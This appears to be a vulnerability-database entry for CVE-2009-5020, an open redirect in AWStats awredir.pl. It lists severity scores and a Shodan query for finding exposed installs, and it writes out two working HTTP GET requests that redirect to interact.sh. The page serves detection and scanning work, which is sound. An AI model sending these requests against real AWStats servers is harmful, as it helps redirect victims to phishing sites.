🔙 목록으로 돌아가기

CVE-2009-5020: AWStats < 6.95 - Open Redirect

TitleAWStats < 6.95 - Open Redirect
Authorpdteam
SeverityMedium
ImpactAllows attackers to redirect users to malicious websites or phishing pages.
RemediationApply all relevant security patches and product upgrades.
CVSS Score5.8
EPSS Score0.01473
CVE IDCVE-2009-5020
CWE IDCWE-20
Shodan Querycpe:"cpe:2.3:a:laurent_destailleur:awstats"
Tags cve2009 cve redirect awstats vuln

🔍 Vulnerability Description

An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

🌐 HTTP Request

GET /awstats/awredir.pl?url=interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-5020.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-5020.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A